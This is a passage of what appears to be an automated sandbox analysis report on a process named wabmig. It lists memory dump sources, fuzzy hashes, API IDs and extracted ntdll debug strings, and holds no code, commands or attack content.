              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
              • Instruction ID: 97b4f61b1277488e4665420664df3273dcbca5e7e101848d2fe2ba7aeab52690
              • Opcode Fuzzy Hash: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
              • Instruction Fuzzy Hash: 64E06DB2610210AFE754CB54DD01FA673ECFB51760F100258B615930E0DAB0BE40CA60
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: cb81d54f3f81516e04cfcc625a9a347969c32aed825e29e04b5f42f4ccb0b7be
              • Instruction ID: f34928a3d90a92ff054bb61794f98bd389f78751017135ab1bf9b7f2811abc44
              • Opcode Fuzzy Hash: cb81d54f3f81516e04cfcc625a9a347969c32aed825e29e04b5f42f4ccb0b7be
              • Instruction Fuzzy Hash: 43E092721109949FC712EF29DD01F8B77AAEF61760F014525B119571A0CA34AD11C7C4
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
              • Instruction ID: a0d6a3f959eb607956a5d7534495fe026cc15ec516ccbe5a3aa35b01659e5d55
              • Opcode Fuzzy Hash: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
              • Instruction Fuzzy Hash: 4CE0C231285659BBDB221A50CC00F697B19EF607A0F108031FE0C6AA90C671ED91D6D4
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
              • Instruction ID: 21c70eb2077d8e3139cf17b71995fd7ebe48572c074bf7dc2f60d683276116bf
              • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
              • Instruction Fuzzy Hash: C3E0C232450BA0EFDB325F11DC10F4276ADFF69B91F114879E08D160A88BB0AD81CF64
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b1d85c2692e90fa3b83e323d7f2441dc1b477acea7db847e77c92a73ea65dc1b
              • Instruction ID: 377529766cdca9151349612529ec57f1b314614ea28a1dd5ea01446d3528b331
              • Opcode Fuzzy Hash: b1d85c2692e90fa3b83e323d7f2441dc1b477acea7db847e77c92a73ea65dc1b
              • Instruction Fuzzy Hash: B0E0C2722104906FC711EF5DDD10F4A73AEEFA5760F014122F158872E0CA64ED02C7D4
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5afac1eda0ac1165b87b7299c4ab81af429a25bb4c0e0508716ee63728992d51
              • Instruction ID: cdc6ba4c84745fb334e99fb98758e1f25477a6cc17ce3b12490ee04a041551c4
              • Opcode Fuzzy Hash: 5afac1eda0ac1165b87b7299c4ab81af429a25bb4c0e0508716ee63728992d51
              • Instruction Fuzzy Hash: CBF0C238251B80CFE61ADF04C1A1F5577B9FB56B84F500498E44A8BBA1C73AA942CB40
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 513c018af8093926a425ffcf59a89caa6ba2b1d98b48f3b0c5e1abf4a0335a68
              • Instruction ID: abe6495535fdc5b69fba97f2c1eb736909bab392a64ab3b7e40864c1ba788f7a
              • Opcode Fuzzy Hash: 513c018af8093926a425ffcf59a89caa6ba2b1d98b48f3b0c5e1abf4a0335a68
              • Instruction Fuzzy Hash: 22D05E322616A0AFD7325F11EE05F837AB9AFA0B51F050569B14A2A4F096A1ED84C6A0
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
              • Instruction ID: 9b190a5c2441eec498d6caf0bc7689e51f647e72c6330d01aea1a41817e9836b
              • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
              • Instruction Fuzzy Hash: D9D0A932A14620AFD7229A1CFC04FC333E9AB88721F06049AB00CC7250C360EC81CA84
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
              • Instruction ID: f656b14d1cbe2574b8579f6427bc66832a31edbe308eb4d82a6aa421689d9ef1
              • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
              • Instruction Fuzzy Hash: DDD022322260B097CB1846516800F537A0DAB82AD4F07006C780D93800C4048C82C2F0
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
              • Instruction ID: 6bb91c63c0dc1c4f5d867f8a5b515fc4506d1ba9378e3456aa6dd20b14c521e2
              • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
              • Instruction Fuzzy Hash: C7D0C935712E80CFD70BCB18C5A0F0533E8BB45B85F8645D0E405CBB62D66CD940CA00
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
              • Instruction ID: afa612dc026725f79d5dc75d07de6816b886bb0caf19c8e869e822a51a00f77d
              • Opcode Fuzzy Hash: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
              • Instruction Fuzzy Hash: 18D01735941AC49FE317CB04C161B407BF8F706B80F851098E04647AA2C2BC9984CB00
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
              • Instruction ID: 55c20b11136a7d5fdd5b1985369739f169410860c24b6a7e35234777f859cf2b
              • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
              • Instruction Fuzzy Hash: ABD01236100249EFCB01DF41C890D9A772EFBD8710F548019FD19076108A31ED62DA50
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
              • Instruction ID: c8304186cb7a1fd39ae7b8f3ea26d1b687b2b078e9642535b46501b2ea0cbf11
              • Opcode Fuzzy Hash: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
              • Instruction Fuzzy Hash: D8C08CB81515816EEB0B4B22C900F2A3B58AB02B07F8201DCAB482A4A2C368DE028218
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b204f885734e773c267cb16866618ee1aa4eb0af53cd6d9f3976f1730c568146
              • Instruction ID: 8e754cc2f12a669c383a4c8492ded54a779456807f0cd5350836a3f1c563dcd0
              • Opcode Fuzzy Hash: b204f885734e773c267cb16866618ee1aa4eb0af53cd6d9f3976f1730c568146
              • Instruction Fuzzy Hash: 0A90022124150802D140725D8458707400A97D4A01F55C021A0464514DC6178A6567B2
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e1d8ef46b215b7cb83bf2ef89f1993378b0b520e7c7a404476820996d14c1f07
              • Instruction ID: 22ff93f08aeb0887987e65277db5e17e1792e573dd83fc882bfb6ea99b26f4ac
              • Opcode Fuzzy Hash: e1d8ef46b215b7cb83bf2ef89f1993378b0b520e7c7a404476820996d14c1f07
              • Instruction Fuzzy Hash: 8890022120194442D140735D4848B0F810957E5602F95C029A4596514CC91689555722
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 052801c8916574c3da035069166bbb7203a21526f63bbbbd8e3b6eba6554c655
              • Instruction ID: 71e292e09e3b04262f4df4f4b18ce9bb3d9073aaa1c21930eec52b213280f23b
              • Opcode Fuzzy Hash: 052801c8916574c3da035069166bbb7203a21526f63bbbbd8e3b6eba6554c655
              • Instruction Fuzzy Hash: 94900231605900129140725D48C8546800967E4701B55C021E0864514CCA158A565362
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 883adaa631c3b64b8b1f695aa2ef425f86c5a7fd8e4b71d74afc2b8702aa5ec2
              • Instruction ID: adb56a48c427412d1b101be453642abd67aeb6c14ab457809751342407e66b6f
              • Opcode Fuzzy Hash: 883adaa631c3b64b8b1f695aa2ef425f86c5a7fd8e4b71d74afc2b8702aa5ec2
              • Instruction Fuzzy Hash: DE900261601600424140725D4848406A00967E5701395C125A0994520CC6198955936A
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c181012e914da7ef84e6c7962bb2d462eddc96dc35bae4866a4660d93ceca682
              • Instruction ID: c2907f396a81cb086f742a769456d841b611c7fef65d165bbf70cc293d590110
              • Opcode Fuzzy Hash: c181012e914da7ef84e6c7962bb2d462eddc96dc35bae4866a4660d93ceca682
              • Instruction Fuzzy Hash: 6490022124555102D150725D4448616800977E4601F55C031A0C54554DC55689556322
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 54bf79f43546bec98fe08011e9d10ff614e54b059ae3a2aebb99ca38f1b9c8f2
              • Instruction ID: f0b3f0cb1ba68f686f1d559242be440598377a682ca157f2f8a6b16006470438
              • Opcode Fuzzy Hash: 54bf79f43546bec98fe08011e9d10ff614e54b059ae3a2aebb99ca38f1b9c8f2
              • Instruction Fuzzy Hash: DA90023120150802D104725D4848686400957D4701F55C021A6464615ED66689917232
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd

              APIs
              Strings
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID: ___swprintf_l
              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
              • API String ID: 48624451-2108815105
              • Opcode ID: e649ed56fac3eed35d1522a52fd237b04b27107f8bfd19bd488ab947631eaf30
              • Instruction ID: b0020a4b30e4bba9609b9ed3984e7c95749f39fadc8bd9cab4d7c0e142b0e9d2
              • Opcode Fuzzy Hash: e649ed56fac3eed35d1522a52fd237b04b27107f8bfd19bd488ab947631eaf30
              • Instruction Fuzzy Hash: 2C51C3B6A00116AFDB11DF98C99097EFBBCFB49241B10816AE4ACD7641D734EF0087E1

              Strings
              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 219E46FC
              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 219E4655
              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 219E4725
              • Execute=1, xrefs: 219E4713
              • CLIENT(ntdll): Processing section info %ws..., xrefs: 219E4787
              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 219E4742
              • ExecuteOptions, xrefs: 219E46A0
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
              • API String ID: 0-484625025
              • Opcode ID: 07daa7a9b06d4667f4c9bdbe2939244f744abd3d31371a88a9e68ca975204a28
              • Instruction ID: 5ff29d12bd4a704ff208cdba089780b11fde39e6ce63c66fc13870a06256d2fc
              • Opcode Fuzzy Hash: 07daa7a9b06d4667f4c9bdbe2939244f744abd3d31371a88a9e68ca975204a28
              • Instruction Fuzzy Hash: 53510631A0021A7EEF15DFA4DCA6FE977BCAB59305F0000E9D60CA7191E7339A498F51
              APIs
              Strings
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID: __aulldvrm
              • String ID: +$-$0$0
              • API String ID: 1302938615-699404926
              • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
              • Instruction ID: 20c911a1794b58d9dea5b2a86e64fda505fc457e1f2825e74e573baa692faeb7
              • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
              • Instruction Fuzzy Hash: 4181F570E012498EEF25CF68C890BEEBBB9AF46361F18419DD85BA76C1C7308B40CB51
              Strings
              • RTL: Re-Waiting, xrefs: 219E7BAC
              • RTL: Resource at %p, xrefs: 219E7B8E
              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 219E7B7F
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
              • API String ID: 0-871070163
              • Opcode ID: b807f5d3cf282f987a5f6f1e28c7a37b49771493aac05a70edb515fc5b31e21e
              • Instruction ID: 4c3bc005822caaa9bcc4607915ab2d2877c0b5424d10a0af137d7f4e08b93536
              • Opcode Fuzzy Hash: b807f5d3cf282f987a5f6f1e28c7a37b49771493aac05a70edb515fc5b31e21e
              • Instruction Fuzzy Hash: 4A4103313007029FD725DF25C840F5AB7E9EF89711F140A6EEA5E97280DB32E9098B92
              APIs
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 219E728C
              Strings
              • RTL: Re-Waiting, xrefs: 219E72C1
              • RTL: Resource at %p, xrefs: 219E72A3
              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 219E7294
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
              • API String ID: 885266447-605551621
              • Opcode ID: d7cd16290e5262ccc3f3ed36c2a3822f0122a91610081ac16f421e3880f31c69
              • Instruction ID: f7f333d25490e2f64f61c6fd852d8dfe44ca7d489643629b79cf75031e2ae0a6
              • Opcode Fuzzy Hash: d7cd16290e5262ccc3f3ed36c2a3822f0122a91610081ac16f421e3880f31c69
              • Instruction Fuzzy Hash: DA41D031700206AFD726CE25CC41F56BBA9FB95711F10061AFA5EAB340DB22E846C7D2
              APIs
              Strings
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID: __aulldvrm
              • String ID: +$-
              • API String ID: 1302938615-2137968064
              • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
              • Instruction ID: 82bbc2e088d8a6b948b52ce74d8db86d4b979c98e4a162b88958b4af668902af
              • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
              • Instruction Fuzzy Hash: 2391C671E0020A9FDB18CF69C880AAEBBB9EF45761F10475EE95DE72D0D7319B408715
              Strings
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID: $$@
              • API String ID: 0-1194432280
